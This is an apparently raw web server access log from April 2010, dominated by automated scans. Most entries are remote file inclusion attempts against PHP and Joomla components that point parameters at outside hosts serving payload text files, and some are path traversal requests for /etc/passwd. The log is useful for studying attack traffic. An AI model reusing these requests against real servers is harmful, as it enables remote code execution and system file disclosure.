174.133.122.210 - - [16/Apr/2010:08:01:09 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:01:09 -0500] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:01:09 -0500] "GET /logs/access_log.1214784000%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:01:09 -0500] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://craftique.org/image/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:01:09 -0500] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://craftique.org/image/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:01:09 -0500] "GET /logs/access_log.1217203200//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://craftique.org/image/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.16.18.219 - - [16/Apr/2010:08:02:44 -0500] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.katalog.artykul.iswift.eu/img/id1.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
217.16.18.219 - - [16/Apr/2010:08:02:44 -0500] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.katalog.artykul.iswift.eu/img/id1.txt???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
217.16.18.219 - - [16/Apr/2010:08:02:44 -0500] "GET /logs/access_log.1268265600/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.katalog.artykul.iswift.eu/img/id1.txt???? HTTP/1.1" 404 370 "-""Mozilla/5.0"
217.16.18.219 - - [16/Apr/2010:08:03:02 -0500] "GET /logs/access_log.1268265600%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.katalog.artykul.iswift.eu/img/id1.txt???? HTTP/1.1" 404 372 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:03:33 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:03:33 -0500] "GET /logs/access_log.1214784000%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:03:33 -0500] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:04:47 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:04:47 -0500] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:04:47 -0500] "GET /logs/access_log.1214784000%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:08:04:59 -0500] "GET /logs/access_log.1220054400/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??????? HTTP/1.1" 404 384 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:08:04:59 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??????? HTTP/1.1" 404 357 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:08:04:59 -0500] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??????? HTTP/1.1" 404 362 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:08:05:04 -0500] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??????? HTTP/1.1" 404 362 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:08:05:04 -0500] "GET /logs/access_log.1220054400%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??????? HTTP/1.1" 404 386 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:08:05:04 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??????? HTTP/1.1" 404 357 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:08:08:43 -0500] "GET /logs//includes/class_item.php?fileExtension=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:08:08:43 -0500] "GET //includes/class_item.php?fileExtension=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:08:08:43 -0500] "GET /logs/access_log.1219363200%20%20//includes/class_item.php?fileExtension=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
95.26.93.19 - - [16/Apr/2010:08:09:07 -0500] "GET /logs/access_log.1238544000 HTTP/1.1" 404 310 "http://yandex.ru/yandsearch?p=4&text=t%3A%5Chome%5Cusers%5Cwm%5Ccomponents%5Ccom_virtuemart%5Cthemes%5Cdefault%5Ctemplates%5Ccommon%5C&lr=213""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.22 Version/10.51"
95.26.93.19 - - [16/Apr/2010:08:09:07 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/logs/access_log.1238544000""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.22 Version/10.51"
207.46.199.54 - - [16/Apr/2010:08:09:50 -0500] "GET /logs/access_log.1201219200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
116.122.36.61 - - [16/Apr/2010:08:10:08 -0500] "GET ///bbs//skin/zero_vote/ask_password.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:08:10:08 -0500] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:08:10:08 -0500] "GET /logs/access_log.1212105600%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
207.46.199.45 - - [16/Apr/2010:08:12:49 -0500] "GET /logs/access_log.1249430400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.196 - - [16/Apr/2010:08:13:50 -0500] "GET /?S=A HTTP/1.1" 200 1003 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.179 - - [16/Apr/2010:08:14:20 -0500] "GET /logs/access_log.1162598400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.223.110.205 - - [16/Apr/2010:08:14:37 -0500] "GET /logs/access_log.1267920000//components/com_simpleboard/file_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 354 "-""libwww-perl/5.834"
66.223.110.205 - - [16/Apr/2010:08:14:37 -0500] "GET //components/com_simpleboard/file_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 327 "-""libwww-perl/5.834"
66.223.110.205 - - [16/Apr/2010:08:14:38 -0500] "GET /logs//components/com_simpleboard/file_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 332 "-""libwww-perl/5.834"
174.133.122.210 - - [16/Apr/2010:08:15:09 -0500] "GET /logs/access_log.1259020800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:15:43 -0500] "GET /logs/access_log.1214784000/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
189.108.172.26 - - [16/Apr/2010:08:16:04 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.pointcominfo.com/phpBB2/id1.txt???????? HTTP/1.1" 200 1955 "-""Mozilla/5.0"
189.108.172.26 - - [16/Apr/2010:08:16:04 -0500] "GET /logs/access_log.1267920000%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.pointcominfo.com/phpBB2/id1.txt???????? HTTP/1.1" 404 316 "-""Mozilla/5.0"
189.108.172.26 - - [16/Apr/2010:08:16:04 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.pointcominfo.com/phpBB2/id1.txt???????? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:16:12 -0500] "GET /logs/access_log.1259020800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:16:18 -0500] "GET /logs/access_log.1259020800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:16:23 -0500] "GET /logs/access_log.1265241600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:16:23 -0500] "GET /logs/access_log.1265760000/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:16:28 -0500] "GET /logs/access_log.1265760000/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:16:33 -0500] "GET /logs/access_log.1252368000/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:16:33 -0500] "GET /logs/access_log.1264896000/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
66.223.110.205 - - [16/Apr/2010:08:17:55 -0500] "GET /logs/access_log.1268956800//components/com_simpleboard/file_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 354 "-""libwww-perl/5.834"
174.133.122.210 - - [16/Apr/2010:08:18:06 -0500] "GET /logs/access_log.1262736000/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:18:06 -0500] "GET /logs/access_log.1266710400/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:18:07 -0500] "GET /logs/access_log.1263859200/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:18:07 -0500] "GET /logs/access_log.1262822400/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:18:07 -0500] "GET /logs/access_log.1238889600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:18:07 -0500] "GET /logs/access_log.1238112000/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:18:25 -0500] "GET /logs/access_log.1214784000/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:18:25 -0500] "GET /logs/access_log.1225238400/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:18:33 -0500] "GET /logs/access_log.1265760000/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:19:44 -0500] "GET /logs/access_log.1223856000/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:19:54 -0500] "GET /logs/access_log.1259020800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:19:58 -0500] "GET /logs/access_log.1265241600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
195.246.116.75 - - [16/Apr/2010:08:20:19 -0500] "GET /logs/access_log.1220054400//modules/xfsection/modify.php?dir_module=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
195.246.116.75 - - [16/Apr/2010:08:20:19 -0500] "GET //modules/xfsection/modify.php?dir_module=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
195.246.116.75 - - [16/Apr/2010:08:20:19 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
174.133.122.210 - - [16/Apr/2010:08:20:33 -0500] "GET /logs/access_log.1214784000/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:20:33 -0500] "GET /logs/access_log.1225238400/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:21:17 -0500] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://craftique.org/image/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:21:17 -0500] "GET /logs/access_log.1219363200//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://craftique.org/image/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:21:17 -0500] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://craftique.org/image/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:08:22:35 -0500] "GET /logs/access_log.1228089600%20%20//includes/class_item.php?fileExtension=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:22:57 -0500] "GET /logs/access_log.1265760000/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:23:14 -0500] "GET /logs/access_log.1214784000/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:23:18 -0500] "GET /logs/access_log.1252368000/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:25:03 -0500] "GET /logs/access_log.1264896000/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:25:04 -0500] "GET /logs/access_log.1262736000/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:25:04 -0500] "GET /logs/access_log.1266710400/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:25:04 -0500] "GET /logs/access_log.1263859200/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
207.46.195.233 - - [16/Apr/2010:08:25:20 -0500] "GET /logs/access_log.1183939200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.240 - - [16/Apr/2010:08:26:19 -0500] "GET /logs/access_log.1240790400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.2.150.103 - - [16/Apr/2010:08:26:29 -0500] "GET /logs/access_log.1220054400//modules/xfsection/modify.php?dir_module=http://www.abamg.org.br/mic22.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.76"
62.2.150.103 - - [16/Apr/2010:08:26:30 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.abamg.org.br/mic22.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.76"
62.2.150.103 - - [16/Apr/2010:08:26:30 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.abamg.org.br/mic22.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.76"
174.133.122.210 - - [16/Apr/2010:08:26:50 -0500] "GET /logs/access_log.1262822400/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:26:50 -0500] "GET /logs/access_log.1238889600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:26:50 -0500] "GET /logs/access_log.1238112000/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:08:26:50 -0500] "GET /logs/access_log.1223856000/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:08:29:39 -0500] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:08:29:39 -0500] "GET //components/com_simpleboard/file_upload.php?sbp=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:08:29:40 -0500] "GET /logs/access_log.1268265600%20%20//components/com_simpleboard/file_upload.php?sbp=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
200.62.142.217 - - [16/Apr/2010:08:30:17 -0500] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.wdiet.co.kr/include/openview/sc1??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
200.62.142.217 - - [16/Apr/2010:08:30:17 -0500] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.wdiet.co.kr/include/openview/sc1??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
200.62.142.217 - - [16/Apr/2010:08:30:17 -0500] "GET /logs/access_log.1219708800/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.wdiet.co.kr/include/openview/sc1??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
66.244.236.248 - - [16/Apr/2010:08:30:48 -0500] "GET /logs/access_log.1214784000%20%20/index.php?pagina=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
66.244.236.248 - - [16/Apr/2010:08:30:48 -0500] "GET /index.php?pagina=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 293 "-""Mozilla/5.0"
66.244.236.248 - - [16/Apr/2010:08:30:48 -0500] "GET /logs/index.php?pagina=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 298 "-""Mozilla/5.0"
207.46.12.108 - - [16/Apr/2010:08:30:55 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30707; MS-RTC LM 8)"
124.49.100.254 - - [16/Apr/2010:08:31:26 -0500] "GET //components/com_simpleboard/file_upload.php?sbp=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:08:31:26 -0500] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:08:31:26 -0500] "GET /logs/access_log.1268265600%20%20//components/com_simpleboard/file_upload.php?sbp=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:08:31:28 -0500] "GET //components/com_simpleboard/file_upload.php?sbp=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:08:31:30 -0500] "GET //components/com_simpleboard/file_upload.php?sbp=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:08:31:42 -0500] "GET /logs/access_log.1268265600%20%20//components/com_simpleboard/file_upload.php?sbp=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:08:31:42 -0500] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:08:31:47 -0500] "GET /logs/access_log.1268265600%20%20//components/com_simpleboard/file_upload.php?sbp=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:08:31:47 -0500] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:08:31:51 -0500] "GET //components/com_simpleboard/file_upload.php?sbp=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:08:31:51 -0500] "GET /logs/access_log.1268265600%20%20//components/com_simpleboard/file_upload.php?sbp=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:08:31:51 -0500] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:08:31:52 -0500] "GET //components/com_simpleboard/file_upload.php?sbp=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:08:31:52 -0500] "GET /logs/access_log.1268265600%20%20//components/com_simpleboard/file_upload.php?sbp=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:08:31:52 -0500] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
66.244.236.248 - - [16/Apr/2010:08:33:59 -0500] "GET /logs/access_log.1214784000/index.php?pagina=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.62.35.55 - - [16/Apr/2010:08:38:32 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://lemoland.ru/forum/images/id1.txt????? HTTP/1.1" 404 351 "-""Mozilla/5.0"
211.62.35.55 - - [16/Apr/2010:08:38:33 -0500] "GET /logs/access_log.1268265600//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://lemoland.ru/forum/images/id1.txt????? HTTP/1.1" 404 373 "-""Mozilla/5.0"
211.62.35.55 - - [16/Apr/2010:08:38:33 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://lemoland.ru/forum/images/id1.txt????? HTTP/1.1" 404 346 "-""Mozilla/5.0"
67.195.112.180 - - [16/Apr/2010:08:38:44 -0500] "GET /logs/ HTTP/1.0" 200 1936 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.62.35.55 - - [16/Apr/2010:08:38:50 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://lemoland.ru/forum/images/id1.txt????? HTTP/1.1" 404 351 "-""Mozilla/5.0"
211.62.35.55 - - [16/Apr/2010:08:38:50 -0500] "GET /logs/access_log.1268265600//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://lemoland.ru/forum/images/id1.txt????? HTTP/1.1" 404 373 "-""Mozilla/5.0"
211.62.35.55 - - [16/Apr/2010:08:38:51 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://lemoland.ru/forum/images/id1.txt????? HTTP/1.1" 404 346 "-""Mozilla/5.0"
67.195.112.180 - - [16/Apr/2010:08:39:55 -0500] "GET /logs/access_log.1270857600 HTTP/1.0" 200 549473 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [16/Apr/2010:08:42:54 -0500] "GET /logs/access_log.1271030400 HTTP/1.0" 200 643402 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
189.108.172.26 - - [16/Apr/2010:08:43:26 -0500] "GET //write_update.php?board_skin_path=http://www.pointcominfo.com/phpBB2/id1.txt???????? HTTP/1.1" 404 301 "-""Mozilla/5.0"
189.108.172.26 - - [16/Apr/2010:08:43:31 -0500] "GET /logs//write_update.php?board_skin_path=http://www.pointcominfo.com/phpBB2/id1.txt???????? HTTP/1.1" 404 306 "-""Mozilla/5.0"
